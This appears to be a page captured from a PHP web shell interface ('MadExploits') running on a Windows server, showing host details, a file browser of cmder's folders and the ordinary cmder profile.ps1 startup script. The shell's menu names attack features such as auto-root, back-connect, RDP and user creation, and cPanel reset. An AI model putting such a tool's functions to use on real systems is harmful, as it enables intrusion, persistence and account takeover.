Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
cmder /
vendor /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxrwxrwx
clink
[ DIR ]
drwxrwxrwx
clink-completions
[ DIR ]
drwxrwxrwx
conemu-maximus5
[ DIR ]
drwxrwxrwx
lib
[ DIR ]
drwxrwxrwx
psmodules
[ DIR ]
drwxrwxrwx
ConEmu.xml.default
53.68
KB
-rw-rw-rw-
Readme.md
49
B
-rw-rw-rw-
clink.lua
18.31
KB
-rw-rw-rw-
clink_settings.default
518
B
-rw-rw-rw-
cmder_exinit
3.81
KB
-rw-rw-rw-
cmder_prompt_config.lua.defaul...
1.91
KB
-rw-rw-rw-
git-for-windows_1.29.1
29
B
-rw-rw-rw-
init.bat
15.71
KB
-rwxrwxrwx
profile.ps1
8.54
KB
-rw-rw-rw-
sources.json
732
B
-rw-rw-rw-
user_aliases.cmd.default
397
B
-rw-rw-rw-
user_profile.cmd.default
721
B
-rw-rw-rw-
user_profile.ps1.default
861
B
-rw-rw-rw-
user_profile.sh.default
295
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile.ps1
# Init Script for PowerShell # Created as part of cmder project # !!! THIS FILE IS OVERWRITTEN WHEN CMDER IS UPDATED # !!! Use "%CMDER_ROOT%\config\user_profile.ps1" to add your own startup commands $CMDER_INIT_START=$(Get-Date -UFormat %s) # Compatibility with PS major versions <= 2 if(!$PSScriptRoot) { $PSScriptRoot = Split-Path $Script:MyInvocation.MyCommand.Path } if ($ENV:CMDER_USER_CONFIG) { # write-host "CMDER IS ALSO USING INDIVIDUAL USER CONFIG FROM '$ENV:CMDER_USER_CONFIG'!" } # We do this for Powershell as Admin Sessions because CMDER_ROOT is not being set. if (! $ENV:CMDER_ROOT ) { if ( $ENV:ConEmuDir ) { $ENV:CMDER_ROOT = resolve-path( $ENV:ConEmuDir + "\..\.." ) } else { $ENV:CMDER_ROOT = resolve-path( $PSScriptRoot + "\.." ) } } # Remove trailing '\' $ENV:CMDER_ROOT = (($ENV:CMDER_ROOT).trimend("\")) # Do not load bundled psget if a module installer is already available # -> recent PowerShell versions include PowerShellGet out of the box $moduleInstallerAvailable = [bool](Get-Command -Name 'Install-Module' -ErrorAction SilentlyContinue) # Add Cmder modules directory to the autoload path. $CmderModulePath = Join-path $PSScriptRoot "psmodules/" $CmderFunctions = Join-Path $CmderModulePath "Cmder.ps1" . $CmderFunctions if(-not $moduleInstallerAvailable -and -not $env:PSModulePath.Contains($CmderModulePath) ){ $env:PSModulePath = $env:PSModulePath.Insert(0, "$CmderModulePath;") } $gitVersionVendor = (readVersion -gitPath "$ENV:CMDER_ROOT\vendor\git-for-windows\cmd") # write-host "GIT VENDOR: ${gitVersionVendor}" # Get user installed Git Version[s] and Compare with vendored if found. foreach ($git in (get-command -ErrorAction SilentlyContinue 'git')) { # write-host "GIT Path: " + $git.Path $gitDir = Split-Path -Path $git.Path $gitDir = isGitShim -gitPath $gitDir $gitVersionUser = (readVersion -gitPath $gitDir) # write-host "GIT USER: ${gitVersionUser}" $useGitVersion = compare_git_versions -userVersion $gitVersionUser -vendorVersion $gitVersionVendor # write-host "Using GIT Version: ${useGitVersion}" # Use user installed Git if ($gitPathUser -eq $null) { if ($gitDir -match '\\mingw32\\bin' -or $gitDir -match '\\mingw64\\bin') { $gitPathUser = ($gitDir.subString(0,$gitDir.Length - 12)) } else { $gitPathUser = ($gitDir.subString(0,$gitDir.Length - 4)) } } if ($useGitVersion -eq $gitVersionUser) { # write-host "Using GIT Dir: ${gitDir}" $ENV:GIT_INSTALL_ROOT = $gitPathUser $ENV:GIT_INSTALL_TYPE = 'USER' break } } # User vendored Git. if ($ENV:GIT_INSTALL_ROOT -eq $null -and $gitVersionVendor -ne $null) { $ENV:GIT_INSTALL_ROOT = "$ENV:CMDER_ROOT\vendor\git-for-windows" $ENV:GIT_INSTALL_TYPE = 'VENDOR' } # write-host "GIT_INSTALL_ROOT: ${ENV:GIT_INSTALL_ROOT}" # write-host "GIT_INSTALL_TYPE: ${ENV:GIT_INSTALL_TYPE}" if (-not($ENV:GIT_INSTALL_ROOT -eq $null)) { $env:Path = Configure-Git -gitRoot "$ENV:GIT_INSTALL_ROOT" -gitType $ENV:GIT_INSTALL_TYPE -gitPathUser $gitPathUser } if ( Get-command -Name "vim" -ErrorAction silentlycontinue) { new-alias -name "vi" -value vim } if (Get-Module PSReadline -ErrorAction "SilentlyContinue") { Set-PSReadlineOption -ExtraPromptLineCount 1 } # Pre assign default prompt hooks so the first run of cmder gets a working prompt. $env:gitLoaded = $false [ScriptBlock]$PrePrompt = {} [ScriptBlock]$PostPrompt = {} [ScriptBlock]$CmderPrompt = { $Host.UI.RawUI.ForegroundColor = "White" Write-Host -NoNewline "$([char]0x200B)" Microsoft.PowerShell.Utility\Write-Host $pwd.ProviderPath -NoNewLine -ForegroundColor Green if (get-command git -erroraction silentlycontinue) { checkGit($pwd.ProviderPath) } Microsoft.PowerShell.Utility\Write-Host "`nλ " -NoNewLine -ForegroundColor "DarkGray" } # Enhance Path $env:Path = "$Env:CMDER_ROOT\bin;$Env:CMDER_ROOT\vendor\bin;$env:Path;$Env:CMDER_ROOT" # Drop *.ps1 files into "$ENV:CMDER_ROOT\config\profile.d" # to source them at startup. if (-not (test-path "$ENV:CMDER_ROOT\config\profile.d")) { mkdir "$ENV:CMDER_ROOT\config\profile.d" } pushd $ENV:CMDER_ROOT\config\profile.d foreach ($x in Get-ChildItem *.psm1) { # write-host write-host Sourcing $x Import-Module $x } foreach ($x in Get-ChildItem *.ps1) { # write-host write-host Sourcing $x . $x } popd # Drop *.ps1 files into "$ENV:CMDER_USER_CONFIG\config\profile.d" # to source them at startup. Requires using cmder.exe /C [cmder_user_root_path] argument if ($ENV:CMDER_USER_CONFIG -ne "" -and (test-path "$ENV:CMDER_USER_CONFIG\profile.d")) { pushd $ENV:CMDER_USER_CONFIG\profile.d foreach ($x in Get-ChildItem *.psm1) { # write-host write-host Sourcing $x Import-Module $x } foreach ($x in Get-ChildItem *.ps1) { # write-host write-host Sourcing $x . $x } popd } # Renaming to "config\user_profile.ps1" to "user_profile.ps1" for consistency. if (test-path "$env:CMDER_ROOT\config\user-profile.ps1") { rename-item "$env:CMDER_ROOT\config\user-profile.ps1" user_profile.ps1 } $CmderUserProfilePath = Join-Path $env:CMDER_ROOT "config\user_profile.ps1" if (Test-Path $CmderUserProfilePath) { # Create this file and place your own command in there. . "$CmderUserProfilePath" # user_profile.ps1 is not a module DO NOT USE import-module } if ($ENV:CMDER_USER_CONFIG) { # Renaming to "$env:CMDER_USER_CONFIG\user-profile.ps1" to "user_profile.ps1" for consistency. if (test-path "$env:CMDER_USER_CONFIG\user-profile.ps1") { rename-item "$env:CMDER_USER_CONFIG\user-profile.ps1" user_profile.ps1 } $env:Path = "$Env:CMDER_USER_CONFIG\bin;$env:Path" $CmderUserProfilePath = Join-Path $ENV:CMDER_USER_CONFIG "user_profile.ps1" if (Test-Path $CmderUserProfilePath) { . "$CmderUserProfilePath" # user_profile.ps1 is not a module DO NOT USE import-module } } if (! (Test-Path $CmderUserProfilePath) ) { Write-Host -BackgroundColor Darkgreen -ForegroundColor White "First Run: Creating user startup file: $CmderUserProfilePath" Copy-Item "$env:CMDER_ROOT\vendor\user_profile.ps1.default" -Destination $CmderUserProfilePath } # # Prompt Section # Users should modify their user_profile.ps1 as it will be safe from updates. # # Only set the prompt if it is currently set to the default # This allows users to configure the prompt in their user_profile.ps1 or config\profile.d\*.ps1 if ( $(get-command prompt).Definition -match 'PS \$\(\$executionContext.SessionState.Path.CurrentLocation\)\$\(' -and ` $(get-command prompt).Definition -match '\(\$nestedPromptLevel \+ 1\)\) ";') { <# This scriptblock runs every time the prompt is returned. Explicitly use functions from MS namespace to protect from being overridden in the user session. Custom prompt functions are loaded in as constants to get the same behaviour #> [ScriptBlock]$Prompt = { $realLASTEXITCODE = $LASTEXITCODE $host.UI.RawUI.WindowTitle = Microsoft.PowerShell.Management\Split-Path $pwd.ProviderPath -Leaf PrePrompt | Microsoft.PowerShell.Utility\Write-Host -NoNewline CmderPrompt PostPrompt | Microsoft.PowerShell.Utility\Write-Host -NoNewline $global:LASTEXITCODE = $realLASTEXITCODE return " " } # Once Created these code blocks cannot be overwritten # if (-not $(get-command PrePrompt).Options -match 'Constant') {Set-Item -Path function:\PrePrompt -Value $PrePrompt -Options Constant} # if (-not $(get-command CmderPrompt).Options -match 'Constant') {Set-Item -Path function:\CmderPrompt -Value $CmderPrompt -Options Constant} # if (-not $(get-command PostPrompt).Options -match 'Constant') {Set-Item -Path function:\PostPrompt -Value $PostPrompt -Options Constant} Set-Item -Path function:\PrePrompt -Value $PrePrompt -Options Constant Set-Item -Path function:\CmderPrompt -Value $CmderPrompt -Options Constant Set-Item -Path function:\PostPrompt -Value $PostPrompt -Options Constant # Functions can be made constant only at creation time # ReadOnly at least requires `-force` to be overwritten # if (!$(get-command Prompt).Options -match 'ReadOnly') {Set-Item -Path function:\prompt -Value $Prompt -Options ReadOnly} Set-Item -Path function:\prompt -Value $Prompt -Options ReadOnly } $CMDER_INIT_END=$(Get-Date -UFormat %s) # write-host "Elapsed Time: $(get-Date) `($($CMDER_INIT_END - $CMDER_INIT_START) total`)"
Close